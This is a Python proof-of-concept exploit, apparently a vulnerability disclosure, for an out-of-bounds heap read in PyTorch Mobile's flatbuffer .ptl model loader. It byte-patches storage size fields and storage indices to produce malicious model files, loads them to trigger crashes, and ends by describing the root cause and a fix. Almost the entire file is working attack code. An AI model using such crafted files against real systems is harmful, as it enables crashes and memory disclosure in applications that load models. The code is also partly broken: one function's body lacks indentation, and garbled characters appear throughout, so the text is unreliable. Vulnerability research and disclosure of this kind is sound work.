# poc-pytorch-flatbuf-storage / poc_flatbuf_storage_oob.py
# Uploaded by 0xiviel via huggingface_hub (revision 90bbdc6, verified)
#!/usr/bin/env python3
"""
PoC: Flatbuffer Storage Vector OOB Read in PyTorch Mobile (.ptl)
Vulnerability: The flatbuffer loader's getStorage() method at
flatbuffer_loader.cpp:696-700 checks `index < storage_loaded_.size()` and
`index < storages_.size()`, but both vectors are sized from
`module->storage_data_size()` β€” an integer field in the flatbuffer schema
that is INDEPENDENT of the actual `storage_data()` vector.
A crafted .ptl file can set `storage_data_size` larger than the actual
`storage_data` vector length, then reference storage indices that pass the
bounds check but are OOB on the real vector. GetMutableObject(index) on the
flatbuffer vector reads past its bounds, interpreting random flatbuffer data
as a StorageData table β†’ heap OOB read, crash, or information disclosure.
Root cause:
- flatbuffer_loader.cpp:306-307 β€” storages_ sized from storage_data_size (int field)
- flatbuffer_loader.cpp:697-698 β€” bounds check against storages_.size()
- flatbuffer_loader.cpp:700 β€” actual access on storage_data() (the real vector)
- NO check that storage_data_size <= storage_data()->size()
Tested: PyTorch 2.10.0+cpu on Python 3.13.11
"""
import io
import os
import struct
import subprocess
import sys
import tempfile
import warnings
import torch
import torch.nn as nn
# Silence torch/JIT deprecation warnings so the PoC's formatted output stays readable.
warnings.filterwarnings('ignore')
def create_valid_flatbuffer_ptl(output_path):
    """Write a known-good flatbuffer .ptl model to *output_path* and return it.

    Uses PyTorch's own lite-interpreter serializer so the baseline file is
    exactly what a legitimate producer would emit (a scripted 4->2 Linear).
    """
    scripted = torch.jit.script(nn.Linear(4, 2))
    scripted._save_for_lite_interpreter(output_path, _use_flatbuffer=True)
    return output_path
def analyze_flatbuffer(data):
    """Parse the flatbuffer structure of a .ptl module and return key offsets.

    Returns a dict containing (when the corresponding field exists in *data*):
      root_table_pos, vtable_pos             — byte positions of root table/vtable
      storage_data_size_pos, storage_data_size_val
                                             — position and value of the int field
      storage_data_vec_pos, storage_data_vec_len
                                             — position and length of the real vector
      ivalues_count, tensor_metadata         — per-TensorMetadata entries with
                                               'storage_location_index' and the byte
                                               position it is stored at (or None when
                                               the field is defaulted / not written)

    Only reads *data*; never modifies it. Assumes the flatbuffer root offset is
    at byte 0 (the stock .ptl layout produced by _save_for_lite_interpreter).

    Fix vs. earlier revision: vtable slots are now bounds-checked against the
    vtable's declared size before being read. FlatBuffers simply omits trailing
    default slots, so a short vtable previously made this parser read bytes
    past the vtable and treat garbage as field offsets.
    """

    def field_offset(vt_pos, vt_size, vt_byte):
        # FlatBuffers semantics: a 2-byte slot lying beyond the vtable's
        # declared size is not stored — the field takes its default (absent).
        if vt_byte + 2 > vt_size:
            return 0
        return struct.unpack_from('<H', data, vt_pos + vt_byte)[0]

    info = {}
    # Root table: the leading uint32 is the offset to the root table.
    root_offset = struct.unpack_from('<I', data, 0)[0]
    info['root_table_pos'] = root_offset
    # VTable: a signed offset stored at the table position points back to it.
    vtable_soffset = struct.unpack_from('<i', data, root_offset)[0]
    vtable_pos = root_offset - vtable_soffset
    info['vtable_pos'] = vtable_pos
    vtable_size = struct.unpack_from('<H', data, vtable_pos)[0]
    # storage_data_size field (VT_STORAGE_DATA_SIZE = 14, vtable index 5)
    sds_field_off = field_offset(vtable_pos, vtable_size, 14)
    if sds_field_off:
        info['storage_data_size_pos'] = root_offset + sds_field_off
        info['storage_data_size_val'] = struct.unpack_from(
            '<i', data, info['storage_data_size_pos']
        )[0]
    # storage_data vector (VT_STORAGE_DATA = 16, vtable index 6)
    sd_field_off = field_offset(vtable_pos, vtable_size, 16)
    if sd_field_off:
        sd_offset_pos = root_offset + sd_field_off
        sd_rel = struct.unpack_from('<I', data, sd_offset_pos)[0]
        sd_vec_pos = sd_offset_pos + sd_rel
        sd_vec_len = struct.unpack_from('<I', data, sd_vec_pos)[0]
        info['storage_data_vec_pos'] = sd_vec_pos
        info['storage_data_vec_len'] = sd_vec_len
    # ivalues vector (VT_IVALUES = 12): scan for TensorMetadata entries and
    # record where each one's storage_location_index lives.
    ivalues_field_off = field_offset(vtable_pos, vtable_size, 12)
    if ivalues_field_off:
        iv_offset_pos = root_offset + ivalues_field_off
        iv_rel = struct.unpack_from('<I', data, iv_offset_pos)[0]
        iv_vec_pos = iv_offset_pos + iv_rel
        iv_count = struct.unpack_from('<I', data, iv_vec_pos)[0]
        info['ivalues_count'] = iv_count
        info['tensor_metadata'] = []
        for i in range(iv_count):
            # Vector of table offsets: 4-byte length prefix then uoffsets.
            offset_pos = iv_vec_pos + 4 + i * 4
            rel = struct.unpack_from('<I', data, offset_pos)[0]
            ival_pos = offset_pos + rel
            # Each IValue is a table; resolve its own vtable.
            iv_vt_soff = struct.unpack_from('<i', data, ival_pos)[0]
            iv_vt = ival_pos - iv_vt_soff
            iv_vt_size = struct.unpack_from('<H', data, iv_vt)[0]
            # val_type (VT=4, field 0) β€” uint8 union discriminator
            val_type = None
            ft_off = field_offset(iv_vt, iv_vt_size, 4)
            if ft_off:
                val_type = data[ival_pos + ft_off]
            # If TensorMetadata (type 5), find storage_location_index
            if val_type == 5:
                # val data (VT=6, field 1) β€” offset to union data
                fv_off = field_offset(iv_vt, iv_vt_size, 6)
                if fv_off:
                    val_rel = struct.unpack_from('<I', data, ival_pos + fv_off)[0]
                    tm_pos = ival_pos + fv_off + val_rel
                    # TensorMetadata vtable
                    tm_vt_soff = struct.unpack_from('<i', data, tm_pos)[0]
                    tm_vt = tm_pos - tm_vt_soff
                    tm_vt_size = struct.unpack_from('<H', data, tm_vt)[0]
                    # storage_location_index (VT=4, field 0) β€” uint32;
                    # an absent slot means the default value 0.
                    sli_val = 0  # default
                    sli_pos = None
                    sli_off = field_offset(tm_vt, tm_vt_size, 4)
                    if sli_off:
                        sli_pos = tm_pos + sli_off
                        sli_val = struct.unpack_from(
                            '<I', data, sli_pos
                        )[0]
                    info['tensor_metadata'].append({
                        'ivalue_index': i,
                        'tm_pos': tm_pos,
                        'storage_location_index': sli_val,
                        'sli_byte_pos': sli_pos,
                    })
    return info
def create_malicious_ptl(input_path, output_path, oob_index=5):
    """Modify a valid .ptl flatbuffer to trigger storage vector OOB read.

    Strategy:
    1. Inflate storage_data_size to be larger than actual storage_data vector
    2. Modify a tensor's storage_location_index to reference an OOB index
    3. The loader's getStorage() passes bounds check but OOB on real vector

    Args:
        input_path: path to a valid .ptl file (as produced by
            create_valid_flatbuffer_ptl); read-only.
        output_path: where the patched, malicious copy is written.
        oob_index: storage index the crafted file will reference; chosen to be
            past the end of the real storage_data vector.

    Returns:
        output_path, after writing the patched bytes.

    Raises:
        KeyError: if the input file lacks the storage_data_size /
            storage_data / tensor_metadata fields this patcher relies on.
    """
    with open(input_path, 'rb') as f:
        data = bytearray(f.read())
    # Locate the byte positions of the fields we need to patch.
    info = analyze_flatbuffer(data)
    orig_sds = info['storage_data_size_val']
    orig_vec_len = info['storage_data_vec_len']
    tensors = info['tensor_metadata']
    print(f" Original storage_data_size: {orig_sds}")
    print(f" Actual storage_data vector length: {orig_vec_len}")
    print(f" TensorMetadata entries: {len(tensors)}")
    for tm in tensors:
        print(f" ivalue[{tm['ivalue_index']}]: "
              f"storage_location_index={tm['storage_location_index']}"
              f" (byte {tm['sli_byte_pos']})")
    print()
    # Step 1: Inflate storage_data_size
    new_sds = oob_index + 5  # ensure oob_index < new_sds
    sds_pos = info['storage_data_size_pos']
    # Patch the int field in place; the real vector is left untouched.
    struct.pack_into('<i', data, sds_pos, new_sds)
    print(f" [*] Changed storage_data_size: {orig_sds} β†’ {new_sds} "
          f"(at byte {sds_pos})")
    # Step 2: Find a tensor with an explicit storage_location_index and change it
    # to oob_index
    target_tm = None
    for tm in tensors:
        # sli_byte_pos is None when the field was defaulted (not written),
        # in which case there is no byte we can patch.
        if tm['sli_byte_pos'] is not None:
            target_tm = tm
            break
    if target_tm is None:
        # All tensors use default (0). We need to modify the one that has sli=0
        # but since it's defaulted (not written), we need a different approach.
        # Instead, shrink storage_data vector length below the used indices.
        print(" [*] No explicit storage_location_index found.")
        print(" [*] Alternative: reduce storage_data vector length to 0")
        print(f" storage_data vector at byte {info['storage_data_vec_pos']}")
        # Set vector length to 0 β€” all indices become OOB
        vec_pos = info['storage_data_vec_pos']
        struct.pack_into('<I', data, vec_pos, 0)
        # Reset storage_data_size back to original for the bounds check
        struct.pack_into('<i', data, sds_pos, orig_sds)
        print(f" [*] Set storage_data vector length: {orig_vec_len} β†’ 0")
        print(f" [*] storage_data_size remains {orig_sds}")
        print()
        print(f" Result: getStorage(0) passes bounds check (0 < {orig_sds})")
        print(f" but storage_data()->GetMutableObject(0) is OOB "
              f"(vector length = 0)")
    else:
        # Redirect one tensor's storage index past the end of the real vector;
        # the inflated storage_data_size lets it pass the loader's check.
        orig_sli = target_tm['storage_location_index']
        sli_pos = target_tm['sli_byte_pos']
        struct.pack_into('<I', data, sli_pos, oob_index)
        print(f" [*] Changed ivalue[{target_tm['ivalue_index']}] "
              f"storage_location_index: {orig_sli} β†’ {oob_index} "
              f"(at byte {sli_pos})")
        print()
        print(f" Result: getStorage({oob_index}) passes bounds check "
              f"({oob_index} < {new_sds})")
        print(f" but storage_data()->GetMutableObject({oob_index}) is OOB "
              f"(vector length = {orig_vec_len})")
    with open(output_path, 'wb') as f:
        f.write(data)
    print(f"\n Saved: {output_path} ({len(data)} bytes)")
    return output_path
def demonstrate_vulnerability():
    """Show the vulnerability: mismatch between storage_data_size and
    actual storage_data vector causes OOB in getStorage().

    Builds a valid .ptl, verifies it loads, patches it via
    create_malicious_ptl, then loads the patched file in a subprocess so a
    native crash cannot take down this driver process.

    Returns:
        True when the malicious file produced a crash, a RuntimeError, or a
        silent load (all treated as evidence the OOB path was reached);
        False when the valid baseline failed to load or the result was
        unexpected.
    """
    print()
    print("=" * 70)
    print(" Part 1: Vulnerability Demonstration")
    print("=" * 70)
    print()
    # Create valid model
    tmpdir = tempfile.mkdtemp(prefix="ptl_")
    valid_path = os.path.join(tmpdir, "valid.ptl")
    create_valid_flatbuffer_ptl(valid_path)
    # First verify the valid model loads fine
    print(" Step 1: Verify valid .ptl loads correctly")
    try:
        m = torch.jit.load(valid_path)
        print(f" [+] Valid model loaded: {type(m)}")
        del m
    except Exception as e:
        # Baseline failure means results would be meaningless; bail out.
        print(f" [-] Valid model failed: {e}")
        return False
    print()
    print(" Step 2: Create malicious .ptl with inflated storage_data_size")
    print()
    malicious_path = os.path.join(tmpdir, "malicious.ptl")
    create_malicious_ptl(valid_path, malicious_path, oob_index=5)
    print()
    print(" Step 3: Load malicious .ptl β†’ OOB read in getStorage()")
    print()
    # Load in subprocess to capture crash
    # signal.alarm(5) inside the child guards against hangs; the literal
    # path is interpolated into the child script (POSIX paths assumed).
    poc_script = f'''
import torch, sys, warnings, signal
warnings.filterwarnings('ignore')
signal.alarm(5)
try:
    m = torch.jit.load("{malicious_path}")
    print("MODEL_LOADED")
    # Try accessing the model
    try:
        result = m.forward(torch.randn(1, 4))
        print(f"FORWARD_OK: {{result}}")
    except Exception as e:
        print(f"FORWARD_ERROR: {{type(e).__name__}}: {{e}}")
except RuntimeError as e:
    err = str(e)
    if "storage" in err.lower() or "corrupt" in err.lower() or "invalid" in err.lower():
        print(f"RUNTIME_ERROR: {{err[:200]}}")
    else:
        print(f"RUNTIME_ERROR: {{err[:200]}}")
except Exception as e:
    print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}")
'''
    result = subprocess.run(
        [sys.executable, '-c', poc_script],
        capture_output=True, text=True, timeout=10
    )
    stdout = result.stdout.strip()
    stderr = result.stderr.strip()
    retcode = result.returncode
    print(f" Return code: {retcode}")
    if stdout:
        print(f" Stdout: {stdout[:300]}")
    if stderr:
        for line in stderr.strip().split('\n')[:5]:
            print(f" Stderr: {line[:200]}")
    if retcode < 0:
        # POSIX: a negative return code means the child died from signal -retcode.
        signum = -retcode
        try:
            import signal as sig
            signame = sig.Signals(signum).name
        except (ValueError, AttributeError):
            signame = f"signal {signum}"
        print(f"\n [+] CRASH: Process killed by {signame} (signal {signum})")
        print(f" [+] OOB read in storage_data vector caused {signame}")
        return True
    elif "RUNTIME_ERROR" in stdout:
        print(f"\n [+] RuntimeError from corrupted flatbuffer data")
        return True
    elif "MODEL_LOADED" in stdout:
        # A clean load still counts: the OOB read occurred but happened to
        # land on bytes that parsed as a plausible StorageData table.
        print(f"\n [!] Model loaded (OOB read happened silently)")
        return True
    else:
        print(f"\n [-] Unexpected result")
        return False
def demonstrate_alternative_attack():
    """Alternative: shrink storage_data vector length instead.

    Instead of inflating the int field, this variant zeroes the real vector's
    length prefix while leaving storage_data_size untouched, so every storage
    index the model legitimately uses becomes out-of-bounds. The patched file
    is loaded in a subprocess to contain a possible native crash.

    Returns:
        True when loading the patched file crashed or raised; False otherwise.
    """
    print()
    print("=" * 70)
    print(" Part 2: Alternative β€” Shrink storage_data vector length")
    print("=" * 70)
    print()
    tmpdir = tempfile.mkdtemp(prefix="ptl2_")
    valid_path = os.path.join(tmpdir, "valid.ptl")
    create_valid_flatbuffer_ptl(valid_path)
    with open(valid_path, 'rb') as f:
        data = bytearray(f.read())
    # Locate the vector's length prefix and the independent int field.
    info = analyze_flatbuffer(data)
    vec_pos = info['storage_data_vec_pos']
    orig_len = info['storage_data_vec_len']
    sds = info['storage_data_size_val']
    print(f" storage_data_size (int field): {sds}")
    print(f" storage_data vector length: {orig_len}")
    print(f" storage_data vector at byte: {vec_pos}")
    print()
    # Set vector length to 0 but keep storage_data_size at 2
    struct.pack_into('<I', data, vec_pos, 0)
    print(f" [*] Set storage_data vector length: {orig_len} β†’ 0")
    print(f" [*] storage_data_size remains: {sds}")
    print()
    print(f" getStorage(0): passes bounds check (0 < {sds})")
    print(f" storage_data()->GetMutableObject(0): OOB! vector length = 0")
    print()
    malicious_path = os.path.join(tmpdir, "malicious_shrunk.ptl")
    with open(malicious_path, 'wb') as f:
        f.write(data)
    print(f" Saved: {malicious_path}")
    print()
    # Load in subprocess
    # signal.alarm(5) in the child guards against hangs while loading.
    poc_script = f'''
import torch, sys, warnings, signal
warnings.filterwarnings('ignore')
signal.alarm(5)
try:
    m = torch.jit.load("{malicious_path}")
    print("MODEL_LOADED")
except RuntimeError as e:
    print(f"RUNTIME_ERROR: {{str(e)[:200]}}")
except Exception as e:
    print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}")
'''
    result = subprocess.run(
        [sys.executable, '-c', poc_script],
        capture_output=True, text=True, timeout=10
    )
    stdout = result.stdout.strip()
    stderr = result.stderr.strip()
    retcode = result.returncode
    print(f" Return code: {retcode}")
    if stdout:
        print(f" Stdout: {stdout[:300]}")
    if stderr:
        for line in stderr.strip().split('\n')[:5]:
            print(f" Stderr: {line[:200]}")
    if retcode < 0:
        # POSIX: negative return code == child killed by that signal number.
        signum = -retcode
        try:
            import signal as sig
            signame = sig.Signals(signum).name
        except (ValueError, AttributeError):
            signame = f"signal {signum}"
        print(f"\n [+] CRASH: Process killed by {signame}")
        return True
    elif "RUNTIME_ERROR" in stdout or "ERROR" in stdout:
        # NOTE: "RUNTIME_ERROR" also contains "ERROR", so this matches both.
        print(f"\n [+] Error from corrupted flatbuffer data")
        return True
    else:
        return False
def demonstrate_vulnerability_details():
"""Show the vulnerable code pattern."""
print()
print("=" * 70)
print(" Part 3: Vulnerability Details")
print("=" * 70)
print()
print(" The flatbuffer schema has TWO independent fields (mobile_bytecode.fbs):")
print()
print(" table Module {")
print(" storage_data_size:int; // integer field (line 205)")
print(" storage_data:[StorageData]; // actual vector (line 206)")
print(" }")
print()
print(" In parseModule() (flatbuffer_loader.cpp:306-307):")
print(" storages_.resize(module->storage_data_size()); // uses INT field")
print(" storage_loaded_.resize(module->storage_data_size(), false);")
print()
print(" In getStorage() (flatbuffer_loader.cpp:696-700):")
print(" TORCH_CHECK(index < storage_loaded_.size()); // checks INT field")
print(" TORCH_CHECK(index < storages_.size()); // checks INT field")
print(" if (!storage_loaded_[index]) {")
print(" auto* storage = module_->storage_data() // accesses REAL vector!")
print(" ->GetMutableObject(index); // OOB!")
print()
print(" The loader NEVER validates:")
print(" storage_data_size <= storage_data()->size()")
print()
print(" FIX: Add validation in parseModule():")
print(" ─────────────────────────────────────────────────────────")
print(" TORCH_CHECK(")
print(" module->storage_data() &&")
print(" module->storage_data_size() <=")
print(" static_cast<int>(module->storage_data()->size()),")
print(' "storage_data_size exceeds actual storage_data vector");')
print()
def main():
    """Run both attack demonstrations, print the details, then summarize."""
    print()
    print(" PoC: Flatbuffer Storage Vector OOB Read (.ptl)")
    print(f" PyTorch {torch.__version__}, Python {sys.version.split()[0]}")
    print()
    inflated_ok = demonstrate_vulnerability()
    shrunk_ok = demonstrate_alternative_attack()
    demonstrate_vulnerability_details()
    # Summary
    separator = "=" * 70
    print(separator)
    print(" RESULTS:")
    if inflated_ok:
        print(" [+] Inflated storage_data_size: OOB on storage_data vector")
    if shrunk_ok:
        print(" [+] Shrunk storage_data vector: OOB on GetMutableObject()")
    for closing_line in (
        " [+] Root cause: no validation that storage_data_size <=",
        " storage_data()->size() in flatbuffer_loader.cpp",
        " [+] Affects: PyTorch Mobile (.ptl flatbuffer format)",
        " [+] Fix: validate storage_data_size against actual vector length",
        separator,
    ):
        print(closing_line)
# Standard entry-point guard: run the PoC only when executed as a script.
if __name__ == "__main__":
    main()